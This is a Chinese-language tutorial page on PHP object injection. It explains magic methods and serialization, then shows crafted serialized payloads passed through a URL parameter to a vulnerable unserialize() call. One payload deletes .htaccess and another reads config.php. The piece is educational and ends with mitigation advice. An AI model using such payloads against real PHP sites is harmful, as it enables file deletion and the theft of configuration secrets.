一文带你搞懂PHP对象注入

目录
  • 背景
  • 漏洞案例
  • PHP类和对象
  • php magic方法
  • php对象序列化
  • 序列化magic函数
  • php对象注入
  • 常见的注入点
  • 其他的利用方法
  • 如何利用或者避免这个漏洞
  • 结论

背景

php对象注入是一个非常常见的漏洞,这个类型的漏洞虽然有些难以利用,但仍旧非常危险,为了理解这个漏洞,请读者具备基础的php知识。

漏洞案例

如果你觉得这是个渣渣洞,那么请看一眼这个列表,一些被审计狗挖到过该漏洞的系统,你可以发现都是一些耳熟能详的玩意(就国外来说)

  • WordPress 3.6.1
  • Magento 1.9.0.1
  • Joomla 3.0.3
  • Ip board 3.3.5

除此之外等等一堆系统,八成可能大概在这些还有其他的php程序中还有很多这种类型的漏洞,所以不妨考虑坐下喝杯咖啡并且试着去理解这篇文章。

PHP类和对象

类和变量是非常容易理解的php概念,打个比方,下面的代码在一个类中定义了一个变量和一个方法。

#!php
<?php
class TestClass
{
    // 一个变量
    public $variable = 'This is a string';
    // 一个简单的方法
    public function PrintVariable()
    {
        echo $this->variable;
    }
}

// 创建一个对象
$object = new TestClass();
// 调用一个方法
$object->PrintVariable();
?>

php magic方法

php类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号“__”开头的,比如 __construct, __destruct, __toString, __sleep, __wakeup 和其他的一些玩意。

这些函数在某些情况下会自动调用,比如:

__construct 当一个对象创建时调用 (constructor) __destruct 当一个对象被销毁时调用 (destructor) __ toString当一个对象被当作一个字符串使用

为了更好的理解magic方法是如何工作的,让我们添加一个magic方法在我们的类中。

#!php
<?php
class TestClass
{
    // 一个变量
    public $variable = 'This is a string';

    // 一个简单的方法
    public function PrintVariable()
   {
        echo $this->variable . '<br />';
    }

    // Constructor
    public function __construct()
   {
        echo '__construct <br />';
    }

    // Destructor
    public function __destruct()
   {
        echo '__destruct <br />';
    }

    // Call
    public function __toString()
   {
        return '__toString<br />';
    }
}
// 创建一个对象
//  __construct会被调用
$object = new TestClass();
// 创建一个方法
//  'This is a string' 这玩意会被输出
$object->PrintVariable();
// 对象被当作一个字符串
//  __toString 会被调用
echo $object;
// End of PHP script
// php脚本要结束了, __destruct会被调用
?>

这个脚本会输出这狗样:

__construct 
This is a string 
__toString 
__destruct

php对象序列化

php允许保存一个对象方便以后重用,这个过程被称为序列化,打个比方,你可以保存一个包含着用户信息的对象方便等等重用。

为了序列化一个对象,你需要调用 “serialize”函数,函数会返回一个字符串,当你需要用到这个对象的时候可以使用“unserialize”去重建对象。

让我们在序列化丢进那个例子,看看序列化张什么样。

</pre>
<pre>
#!php
<?php
// 某类
class User
{
    // 类数据
    public $age = 0;
    public $name = '';

    // 输出数据
    public function PrintData()
    {
        echo 'User ' . $this->name . ' is ' . $this->age
             . ' years old. <br />';
    }
}
// 创建一个对象
$usr = new User();
// 设置数据
$usr->age = 20;
$usr->name = 'John';
// 输出数据
$usr->PrintData();
// 输出序列化之后的数据
echo serialize($usr);
?>

它会输出

User John is 20 years old. 
O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

你可以看到序列化之后的数据中 有 20和John,其中没有任何跟类有关的东西,只有其中的数据被数据化。

为了使用这个对象,我们用unserialize重建对象。

#!php
<?php
// 某类
class User
{
    // Class data
    public $age = 0;
    public $name = '';

    // Print data
    public function PrintData()
    {
        echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
    }
}
// 重建对象
$usr = unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}');

// 调用PrintData 输出数据
$usr->PrintData();
?>

这会输出

User John is 20 years old

序列化magic函数

magic函数constructor (__construct)和 destructor (__destruct) 是会在对象创建或者销毁时自动调用,其他的一些magic函数会在serialize 或者 unserialize的时候被调用。

__sleep magic方法在一个对象被序列化的时候调用。__wakeup magic方法在一个对象被反序列化的时候调用。

注意 __sleep 必须返回一个数组与序列化的变量名。

#!php
<?php
class Test
{
    public $variable = 'BUZZ';
    public $variable2 = 'OTHER';

    public function PrintVariable()
   {
        echo $this->variable . '<br />';
    }

    public function __construct()
   {
        echo '__construct<br />';
    }

    public function __destruct()
   {
        echo '__destruct<br />';
    }

    public function __wakeup()
   {
        echo '__wakeup<br />';
    }

    public function __sleep()
   {
        echo '__sleep<br />';
        return array('variable', 'variable2');
    }
}

// 创建一个对象,会调用 __construct
$obj = new Test();

// 序列化一个对象,会调用 __sleep
$serialized = serialize($obj);

//输出序列化后的字符串
print 'Serialized: ' . $serialized . <br />';
// 重建对象,会调用 __wakeup
$obj2 = unserialize($serialized);

//调用 PintVariable, 会输出数据 (BUZZ)
$obj2->PrintVariable();
// php脚本结束,会调用 __destruct
?>

这玩意会输出:

__construct 
__sleep 
Serialized: O:4:"Test":2:
{s:8:"variable";s:4:"BUZZ";s:9:"variable2";s:5:"OTHER";} 
__wakeup 
BUZZ 
__destruct 
__destruct

你可以看到,我们创建了一个对象,序列化了它(然后__sleep被调用),之后用序列化对象重建后的对象创建了另一个对象,接着php脚本结束的时候两个对象的__destruct都会被调用。

php对象注入

现在我们理解了序列化是如何工作的,我们该如何利用它?事实上,利用这玩意的可能性有很多种,关键取决于应用程序的流程与,可用的类,与magic函数。

记住序列化对象的值是可控的。

你可能会找到一套web程序的源代码,其中某个类的__wakeup 或者 __destruct and其他乱七八糟的函数会影响到web程序。

打个比方,我们可能会找到一个类用于临时将日志储存进某个文件,当__destruct被调用时,日志文件会被删除。然后代码张这狗样。

#!php
<?php 

class LogFile
{
    // log文件名
    public $filename = 'error.log';

    // 某代码,储存日志进文件
    public function LogData($text)
   {
        echo 'Log some data: ' . $text . '<br />';
        file_put_contents($this->filename, $text, FILE_APPEND);
    }

    // Destructor 删除日志文件
    public function __destruct()
   {
        echo '__destruct deletes "' . $this->filename . '" file. <br />';
        unlink(dirname(__FILE__) . '/' . $this->filename);
    }
}
?>

某例子关于如何使用这个类

#!php
<?php
include 'logfile.php';

// 创建一个对象
$obj = new LogFile();

// 设置文件名和要储存的日志数据
$obj->filename = 'somefile.log';
$obj->LogData('Test');

// php脚本结束啦,__destruct被调用,somefile.log文件被删除。
?>

在其他的脚本,我们可能又恰好找到一个调用“unserialize”函数的,并且恰好变量是用户可控的,又恰好是$_GET之类的什么玩意的。

#!php
<?php
include 'logfile.php';

// ... 一些狗日的代码和 LogFile 类 ...
// 简单的类定义
class User
{
    // 类数据
    public $age = 0;
    public $name = '';

    // 输出数据
    public function PrintData()
   {
        echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
    }
}

// 重建 用户输入的 数据
$usr = unserialize($_GET['usr_serialized']);
?>

你看,这个代码调用了 “LogClass” 类,并且有一个 “unserialize” 值是我们可以注入的。

所以构造类似这样的东西:

script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

究竟发生了什么呢,因为输入是可控的,所以我们可以构造任意的序列化对象,比如:

#!php
<?php
$obj = new LogFile();
$obj->filename = '.htaccess';
echo serialize($obj) . '<br />';
?>

这个会输出

O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";} 
__destruct deletes ".htaccess" file.

现在我们将构造过后的序列化对象发送给刚才的脚本:

script.php?usr_serialized=O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess”;}

这会输出

__destruct deletes ".htaccess" file.

现在 .htaccess 已经被干掉了,因为脚本结束时 __destruct会被调用。不过我们已经可以控制“LogFile”类的变量啦。

这就是漏洞名称的由来:变量可控并且进行了unserialize操作的地方注入序列化对象,实现代码执行或者其他坑爹的行为。

虽然这不是一个很好的例子,不过我相信你可以理解这个概念,unserialize自动调用 __wakeup 和 __destruct,接着攻击者可以控制类变量,并且攻击web程序。

常见的注入点

先不谈 __wakeup 和 __destruct,还有一些很常见的注入点允许你利用这个类型的漏洞,一切都是取决于程序逻辑。

打个比方,某用户类定义了一个__toString为了让应用程序能够将类作为一个字符串输出(echo $obj) ,而且其他类也可能定义了一个类允许__toString读取某个文件。

#!php
<?php
// … 一些include ...
class FileClass
{
    // 文件名
    public $filename = 'error.log';

    //当对象被作为一个字符串会读取这个文件
    public function __toString()
    {
        return file_get_contents($this->filename);
    }
}

// Main User class
class User
{
    // Class data
    public $age = 0;
    public $name = '';

    // 允许对象作为一个字符串输出上面的data
    public function __toString()
   {
        return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
    }
}

// 用户可控
$obj = unserialize($_GET['usr_serialized']);
// 输出 __toString
echo $obj;
?>

so,我们构造url

script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John”;}

再想想,如果我们用序列化调用 FileClass呢

我们创建利用代码

#!php
<?php
$fileobj = new FileClass();
$fileobj->filename = 'config.php';
echo serialize($fileobj);

?>

接着用生成的exp注入url

script.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:10:"config.php”;}

接着网页会输出 config.php的源代码

#!php
<?php
     $private_data = 'MAGIC';
?>

ps:我希望这让你能够理解。

其他的利用方法

可能其他的一些magic函数海存在利用点:比如__call 会在对象调用不存在的函数时调用,__get 和 __set会在对象尝试访问一些不存在的类,变量等等时调用。

不过需要注意的是,利用场景不限于magic函数,也有一些方式可以在一半的函数中利用这个漏洞,打个比方,一个模块可能定义了一个叫get的函数进行一些敏感的操作,比如访问数据库,这就可能造成sql注入,取决于函数本身的操作。

如何利用或者避免这个漏洞

别在任何用户可控的地方使用“unserialize”,可以考虑“json_decode“

结论

虽然很难找到而且很难利用,但是这真的真的很严重,可以导致各种各样的漏洞。

到此这篇关于一文带你搞懂PHP对象注入的文章就介绍到这了,更多相关PHP对象注入内容请搜索我们以前的文章或继续浏览下面的相关文章希望大家以后多多支持我们!

(0)

相关推荐

  • 深入讲解PHP的对象注入(Object Injection)

    前言 虽然这篇文章叫做PHP对象注入,但是本质上还是和PHP的序列化的不正确使用有关.如果你阅读了PHP中的SESSION反序列化机制对序列化就会有一个大致的认识.PHP对象注入其实本质上也是由于序列化引起的. 基础知识 在php类中可能会存在一些叫做魔术函数(magic 函数),这些函数会在类进行某些事件的时候自动触发,例如__construct()会在一个对象被创建时调用, __destruct()会在一个对象销毁时调用, __toString当对象被当做一个字符串的时候被调用.常见的魔术函

  • 浅析PHP反序列化中过滤函数使用不当导致的对象注入问题

    1.漏洞产生的原因 #### 正常的反序列化语句是这样的 $a='a:2:{s:8:"username";s:7:"dimpl3s";s:8:"password";s:6:"abcdef";}'; 但是如果写成这样 $b='a:2:{s:8:"username";s:7:"dimpl3s";s:8:"password";s:6:"123456";}

  • PHP序列化/对象注入漏洞分析

    本文是关于PHP序列化/对象注入漏洞分析的短篇,里面讲述了如何获取主机的远程shell. 如果你想自行测试这个漏洞,你可以通过 XVWA 和 Kevgir 进行操作. 漏洞利用的第一步,我们开始测试目标应用是否存在PHP序列化.为了辅助测试,我们使用了Burpsuite的SuperSerial插件,下载地址在 这里 .它会被动检测PHP和Java序列化的存在. 分析 我们检测到了应用里使用了PHP序列化,所以我们可以开始确认应用代码里是否含有远程代码执行漏洞.需要注意的是,序列化对象是从参数"r

  • 一文带你搞懂PHP对象注入

    目录 背景 漏洞案例 PHP类和对象 php magic方法 php对象序列化 序列化magic函数 php对象注入 常见的注入点 其他的利用方法 如何利用或者避免这个漏洞 结论 背景 php对象注入是一个非常常见的漏洞,这个类型的漏洞虽然有些难以利用,但仍旧非常危险,为了理解这个漏洞,请读者具备基础的php知识. 漏洞案例 如果你觉得这是个渣渣洞,那么请看一眼这个列表,一些被审计狗挖到过该漏洞的系统,你可以发现都是一些耳熟能详的玩意(就国外来说) WordPress 3.6.1 Magento

  • 一文带你搞懂JS中六种For循环的使用

    目录 一.各个 for 介绍 1.for 2.for ... in 3.for ... of 4.for await...of 5.forEach 6.map 二.多个 for 之间区别 1.使用场景差异 2.功能差异 3.性能差异 三.for 的使用 for 循环在平时开发中使用频率最高的,前后端数据交互时,常见的数据类型就是数组和对象,处理对象和数组时经常使用到 for 遍历,因此下班前花费几分钟彻底搞懂这 5 种 for 循环.它们分别为: for for ... in for ... o

  • 一文带你搞懂Spring响应式编程

    目录 1. 前言 1.1 常用函数式编程 1.2 Stream操作 2. Java响应式编程 带有中间处理器的响应式流 3. Reactor 3.1 Flux & Mono 3.2 Flux Mono创建与使用 4. WebFlux Spring WebFlux示例 基于注解的WebFlux 基于函数式编程的WebFlux Flux与Mono的响应式编程延迟示例 总结 哈喽,大家好,我是指北君. 相信响应式编程经常会在各种地方被提到.本篇就为大家从函数式编程一直到Spring WeFlux做一次

  • 一文带你搞懂Python中的文件操作

    目录 一.文件的编码 二.文件的读取 2.1 open()打开函数 2.2 mode常用的三种基础访问模式 2.3 读操作相关方法 三.文件的写入 写操作快速入门 四.文件的追加 追加写入操作快速入门 五.文件操作综合案例 一.文件的编码 计算机中有许多可用编码: UTF-8 GBK Big5 等 UTF-8是目前全球通用的编码格式 除非有特殊需求,否则,一律以UTF-8格式进行文件编码即可. 二.文件的读取 2.1 open()打开函数 注意:此时的f是open函数的文件对象,对象是Pytho

  • 一文带你搞懂Vue3的基本语法

    目录 1.通过 CDN 使用 Vue3 2.Vue3 模板语法 文本 Html 属性 表达式 指令 参数 3.模板用户输入双向绑定 1.通过 CDN 使用 Vue3 你可以借助 script 标签直接通过 CDN 来使用 Vue: <script src="https://unpkg.com/vue@next"></script> 通过 CDN 使用 Vue 时,不涉及“构建步骤”.这使得设置更加简单,并且可以用于增强静态的 HTML 或与后端框架集成 接下来我

  • 一文带你搞懂Java中的递归

    目录 概述 递归累加求和 计算1 ~ n的和 代码执行图解 递归求阶乘 递归打印多级目录 综合案例 文件搜索 文件过滤器优化 Lambda优化 概述 递归:指在当前方法内调用自己的这种现象. 递归的分类: 递归分为两种,直接递归和间接递归. 直接递归称为方法自身调用自己. 间接递归可以A方法调用B方法,B方法调用C方法,C方法调用A方法. 注意事项: 递归一定要有条件限定,保证递归能够停止下来,否则会发生栈内存溢出. 在递归中虽然有限定条件,但是递归次数不能太多.否则也会发生栈内存溢出. 构造方

  • 一文带你搞懂Java中Object类和抽象类

    目录 一.抽象类是什么 二.初始抽象类 2.1 基本语法 2.2 继承抽象类 三.抽象类总结 四.Object类 4.1 初始Object 4.2 toString 4.3 equals 4.4 hashcode 一.抽象类是什么 在面向对象的概念中,所有的对象都是通过类来描绘的,但是反过来,并不是所有的类都是用来描绘对象的,如果一个类中没有包含足够的信息来描绘一个具体的对象,这样的类就是抽象类. 由于抽象类不能实例化对象,所以抽象类必须被继承,才能被使用.也是因为这个原因,通常在设计阶段决定要

  • 一文带你搞懂Java中Synchronized和Lock的原理与使用

    目录 1.Synchronized与Lock对比 2.Synchronized与Lock原理 2.1 Synchronized原理 2.2 Lock原理 3.Synchronized与Lock使用 Synchronized Lock 4.相关问题 1.Synchronized与Lock对比 实现方式:Synchronized是Java语言内置的关键字,而Lock是一个Java接口. 锁的获取和释放:Synchronized是隐式获取和释放锁,由Java虚拟机自动完成:而Lock需要显式地调用lo

  • 一文带你搞懂Numpy中的深拷贝和浅拷贝

    目录 1. 引言 2. 浅拷贝 2.1 问题引入 2.2 问题剖析 3. 深拷贝 3.1 举个栗子 3.2 探究原因 4. 技巧总结 4.1 判断是否指向同一内存 4.2 其他数据类型 5. 总结 1. 引言 深拷贝和浅拷贝是Python中重要的概念,本文重点介绍在NumPy中深拷贝和浅拷贝相关操作的定义和背后的原理. 闲话少说,我们直接开始吧! 2. 浅拷贝 2.1 问题引入 我们来举个栗子,如下所示我们有两个数组a和b,样例代码如下: import numpy as np a = np.ar

  • 一文带你搞懂Maven的继承与聚合

    目录 一.继承 二.继承关系实施步骤 三.聚合与继承的区别 一.继承 我们已经完成了使用聚合工程去管理项目,聚合工程进行某一个构建操作,其他被其管理的项目也会 执行相同的构建操作.那么接下来,我们再来分析下,多模块开发存在的另外一个问题,重复配置的问题,我们先来看张图: ■ spring-webmvc.spring-jdbc在三个项目模块中都有出现,这样就出现了重复的内容 ■ spring-test只在ssm_crm和ssm_goods中出现,而在ssm_order中没有,这里是部分重复的内容

随机推荐